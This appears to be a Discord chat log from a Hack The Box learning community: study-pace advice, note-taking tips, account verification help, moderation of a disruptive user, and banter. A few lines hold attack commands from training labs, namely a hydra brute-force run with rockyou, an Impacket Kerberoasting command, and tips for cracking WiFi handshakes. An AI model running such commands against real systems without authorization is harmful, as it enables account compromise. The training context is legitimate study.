it should be in /usr/share by default if im not mistaken
or maybe thats kali
Help please. How do i search for L____r in powershell without errors? When I do the string command I don’t get error but I get error when I do select-string
I will have a look there, I think thats just normal Kali tho
Yeah but that's from the example, which i was confused about
Think about what webroot means, it makes perfect sense
Sometimes you can be assigned the ip from the example
how much time do yall spend in HTB?
Per day?
on the main platform or academy
anywhere
im kinda curious if i should up game
i've been doing the seasonal boxes so i guess 8 hours on those
damn
for academy, when i was doing my CDSA cert, i took every moment time i had off during college to do the coursework
I mean you shouldn't compare your hours to other peoples, people have different circumstances and can allocate more or less time than other people
I work full time and I try to do like 4-6 hours a day
to be straight up, generally speaking you do as much time as is good for you so you don't burn out.
I'll do an hour every day, maybe more if I'm feeling it because I got some thinking problems rn.
but if I feel tired I take a break and do less
makes sense
just felt i was doing too little in a way
especially since im a beginner
some people are machines, some people ain't that's just how it is
do what you feel is adequate. if you feel like you're working at a pace where you can understand the content the easiest, then you're doing just fine
ofc
thank you
Just like anything in life you have to pave your way
we all started out at square one. just keep at it, and you'll eventually become better
ye, I think what's most important is that you know you're at a pace where you're not just reading/doing the content but you also fully understand what's going on.
the moment you're kinda just drifting through you might want to consider a break
alright good to know
thank you
i feel like im gonna forget some things and thats stressing me
even though i can just go back and take a look at them again
I think that's kinda natural tbh, I re-read a few things but I get the gist pretty quickly since I absorbed it pretty well first time around.
There's a page on filtering with a bunch of fresh commands and I p much just went back to my terminal, cat pword.txt and input all the commands as a refresher to solidify it to memory
like rn look
" Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file."
RAAAAHHH
oh nvm
not sure why that scared me
But to be clear putting the attack host ip here is correct right?
Yes
Take notes
I'm eventually gonna index my notes in obsidian with backlinks and such to clarify context or basic syntax
o
i'm gonna get in on note taking as well so I don't have to backpedal into pages for commands I forget 😬
yeah fr
It do not open
Read and follow #welcome to gain access
It mostly saves time from scouring the entirety of the modules for one command
I can't stress enough how important notes are or even doing a "writeup" on how you did a medium lab etc.
I don't know how
I am a beginner
Keeping track of your mindset and how you tackle problems helps you understand how to tackle similar problems
Read the section of welcome labeled "verification"
TAKE NOTES
🗿
hacks into your computer and takes your notes
I am phone🤣
bro might be Marcus from watch dogs
Ok? You can create an htb account on mobile
Well this server revolves around the hackthebox website and their various platforms brother
Are you girl🗿
If you aren't interested in cybersecurity, this server isn't for you
And what
Only on days that end in y
i love how he completely ignored whatever you said
you can read what this server is
and straight up asked if you are a girl xd
I love hacking to hack people and He threaten
Cringe people are gonna be cringe
let him cook chat
Then you know at a minimum how to maybe read
I am arabic
To invoke ancient Magic
sigma
And my language in eng is 30 over 100
ah quick question to view a txt file through cmd
you just type in the full txt name right?
🤣🤍
cat wont work
yes
Depends
windows
Windows = type <file>.txt
A b c d e f g k I j k l m n p q r s t u v w x y z🤣
o
Or iirc Get-FileContent in Powershell
yeah fucking internet dude
What are talking and doing
talking about hacking banks
Just give it a sec and try type waldo.txt
I didn't understand anything🗿
nah nah its been like this since like your reply to my "TAKE NOTES"
thats why youre here
to learn
are you using pwnbox or your own vm?
Sigma
ctrl c wont even work holy shit
Ok
own vm
and both have the same problem
Oof
i mean it makes sense
since we get wifi from our neighbour
Big skibidi Ohio moment
wireless isn't stable, especially going through walls with distance
yeah we havent paid our own connection yet
I want someone necessary.
I'm gonna assume with consent here
¯_(ツ)_/¯
😈
What does this even mean
ye ofc
¯_(ツ)_/¯
I need something urgent
😕
#rules , English only server brother
I want some one
Sup g0b, enjoying the Sunday?
In message
Don't we all 
i could use someone right now..
You told me what it mean
I need to finish my uni work
thank you
All good man, just chilling 🙂 How're you?
Loading the gun rn, you wanted the Cobain option yeah?
i'm not cultured enough to know who kurt cobain is
Hating executive dysfunction rn, need to do uni work but like brain doesn't wanna focus
I talk you in message
He took a hit off a shotgun,
No
ouch
It is take from your time 30sec
The answer is still: no
No you
🙂

If you a girl I am a boy
wut
lmao
???
It still 30sec
I don't want any seconds with you
The message request though was funny, not gonna share here
Language barriers and all that
they told me "fuck you" for not wanting to dm, its joever
damn
now be a good boy and behave

(not in a kinky way)
Bruh
aw he left?
Im a girl
What
@ocean night I don't think your mute worked
They're timed out
it did but little time
Anyway
i saw the unmute in realtime
Networking concepts are fun
ACK
so i believe the Setting Up module suggests a couple different distros for pentesting and one of them was BlackArch
Having my first day at a job tmrw
and i'm trying to install that right now but it's kind of pissing me off
they sound fun
but im not sure
im still like 50% through the information security path

arch
spending more time setting up the distro than learning anything
It pisses everyone off
ooo sounds fun
Hope it goes well for you! Just remember to breath, listen and nod in the right places 😉
And spend their training budget :)
🐇 breathe in the right places

cybersecurity job?or something else
Corpa
then i finish installing, reboot, and i'm told there's no OS installed
tyty. I hope i dont mix those 3 up
Happy for you, enjoy it!
Cloud eng. Will still get my ctps cert done, after that they said they paying for cloud certs etc
Breathing is for nerds

ooo alright sounds interesting
remember to breathe from the head, listen from the eyes, and nod with your ears
Sounds like fun!
What is the focus gonna be on? AWS? Google Cloud? Or just in general
Iirc comptia has a cloud cert 🤢
I have it, it's shit.
They doing in azure everything. And for their customers. So mostly automating scripts for it. And work in flows a bit aswell
ah comptia 
Wait, there was a topic?
The other 50% is ez
I have not yet checked the certs out what they offer/learn, which are good. And yea job paying for them lol thank god.
Ah shot its not general
mbmvm
This has turned in to general lol
Quick rename it to general
Don't tempt me Frodo
i mean yeah im not gonna lie these look hella interesting
[Please no, I can only handle so much brain rot in a day]

Marcie.. got a message from that person too.. apparently I'm attacking them because they're a girl
Am I cancelled? 😦

Very much sad
R.I.P g0b career
Time to go make a twitlonger and break out the Ukelele

his logic, not mine
Man I wish you could collapse the member groups in the list of members in channel
I havent seen member list since the big UI change
Idk how to access it lol. And on computer its like worst. Cant search/filter...
Currently? On mobile. But other than that desktop client
Desktop has it literally on the right hand side, at least for me
Is that mod privs? 😆
Yea on computer yea. But on mobile it used to have it if you swiped right
ahh ok
Yeah swipe on mobile just brings up reply
You can hit the channel at the top to get the members list on mobile
This one? Thats only for ppl with privileges.
Ah lol. I see
Member list found
Nah i thought you meant the "Member" channel, used for monitoring members
Wait, there are instructions @fathom pendant ?
Just the "verification" part
😊
But basic instruction comprehension is too complex for many people
or they can't verify bc business account
Read the "verification" section of #welcome
SSO will save us all.
That contains all the info needed to access more of the server
..or damn us
thank you for implementing SSO
I've been a pain in the engineers sides with a load of feedback I've dropped on them the past couple of weeks lol
Some to do with SSO, Discord verification, academy etc etc
The team are doing good work 🙂 
No?
Working overtime
You need to get your account identifier from https://app.hackthebox.com under settings
Overtime doesn't exist for C-level, it's just time lol
and I like to help
That's what /feedback is for! 🙂
Where are you facing this issue, when registering on https://app.hackthebox.com ? Hit me up in DM with screenshots of the issue you're facing
G0b asked to dm with issues you're facing btw so he can help
Certified HTB Discord Member (CHDM)
He's one of the senior nerds at htb

Kitten role for that
never say that again.

blackarch is going to kill me
Yeah.. colour me not surprised
damn bro, Setting Up module is the hardest so far
Just wait until you get to "Getting Started"
The 1st box took used tactics that were not covered in eJPT.
dear lord
Well, that's just charming
I mean, you could technically play from a tablet or phone
but I wouldn't love that experience
Well tablet would be ok with a keyboard
(using Pwnbox)
Playing htb with a phone sounds like fun
Part 3 of the #welcome verification subsection
go to #bot-commands and do /verify {token}
if you download iDOS on your iPhone, you can install Windows from an ISO in iDOS
You're trying to literally use the words (ACCOUNT_IDENTIFER) is your problem
ew
Read steps 1 and 2 to successfully do step 3
You can just do /verify and the bot should dm you
You need instead {token}, your actual token from the website > profile > settings
Look, we're trying to help you. You evaded a ban which is a rule break on its own. Read the instructions in #welcome, get your token from the settings page on https://app.hackthebox.com, and verify with the command stated above
Bruh
It'd /identify to do it in the #bot-commands channel
Nah, just basic reading comprehension tbh
Well, reading and reading comprehension are two separate things
The message in #welcome says it pretty clearly
And we're instructing you how
takes less than a minute. if you just performed the actions instead of typing here you'd be done
ACCOUNT_IDENTIFER and {token} are placeholders for your actual token/account_identifier
You're 12?
Isnt discord above 13???
Alright boss, just follow the instructions here or in the walkthrough available here.
Oh my god ok enough
Rest in peace o7
oof
So, modules.. am I right?
Crazy
it's something new every day here
we tried ¯_(ツ)_/¯
this is an uphill battle
What on earth
Nevermind, I don't want to know
I'm gonna grab a snack after that adventure
Oh a DM, yaay 😆
Anyone else feel personally insulted?
Oh, actually wasn't them
Always
Also there's no command that needs to be run
418 response best response
Short and stout eh?
That's really cool, never seen it IRL b4.
The HTTP 418 I'm a teapot client error response code indicates that the server refuses to brew coffee because it is, permanently, a teapot. A combined coffee/tea pot that is temporarily out of coffee should instead return 503. This error is a reference to Hyper Text Coffee Pot Control Protocol defined in April Fools' jokes in 1998 and 2014.
418 is an April fools joke thing
But some devs use it
I'll use it in my next API.
live ban
finally
Annnnd it crashed
no... it works
For now
God bless your little heart. Did you not install the desktop environment? It comes complete with a special message. 🤣
yes i would like to install eterm but i can't open the TERMINAL
is there a module for wifi-cracking? i need it for an exercise in my university
Hi , Can someone help me with the 1st question of the Login brute force assessment:
"When you try to access the IP shown above, you will not have authorization to access it. Brute force the authentication and retrieve the flag."
https://academy.hackthebox.com/module/57/section/515
I tried typing this hydra command, but it doesn't seem to work (even though the password lists I used are there):
||
hydra -L /opt/useful/SecLists/Usernames/Names/names.txt -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -u -f 94.237.63.83 -s 48680 http-get /||
don't worry i will soon be able to use it
Aircrack ng etc are enough for it. Get the handshake and then bruteforce it. But what kind of uni gives an exercise about wifi hacking. 
I would recommend reviewing the "Login Form Attacks" section again and trying what they give you in there.
Nope
So follow the steps in the Login Form Attacks section. Okay
If you "need it for an exercise" then your uni should be providing resources for you @worn matrix
sorry, I meant the "Default Passwords" section. same list really just brute forcing the http page instead
There's a module covering the cracking portion, but not the capture
cybersecurity course
There's a module on password cracking in general, just not specifically for wifi because that's like one tiny part of cracking passwords.
Yeah
just use hashcat like on everything else lol
Well the problem is you'd need a wifi card to even capture a handshake. Or did they provide you with one already and you just need to crack it?
I think there are machines that include a WiFi portion, but it's only pretty ancient methods
they probably provided a pcap file
the question is what we need, not to give an example, so i may only write what tool we need and how we do it from a theoretical perspective
i'll send him an email to be sure
Why would:
./GetUserSPNs.py inlanefreight.local/username:pass -dc-ip x.x.x.x -request
produce valid SPN for a user, but also add error:
[-] [Errno 2] No such file or directory: './DC01$@INLANEFREIGHT.LOCAL_krbtgt@INLANEFREIGHT.LOCAL.ccache'
I am not specifying any kerberos ticket, nor having -no-pass option
Note: running it over chisel.
make sure you understand the question because 'cracking a password' is vastly different than capturing a handshake or pmkid and cracking it.
yeah, the point is to understand, not only write the answer
thanks a lot for the help really
Cracking with hashcat yeah?
Makes sense for enterprise
Post-incident focused though I think
Because it's special


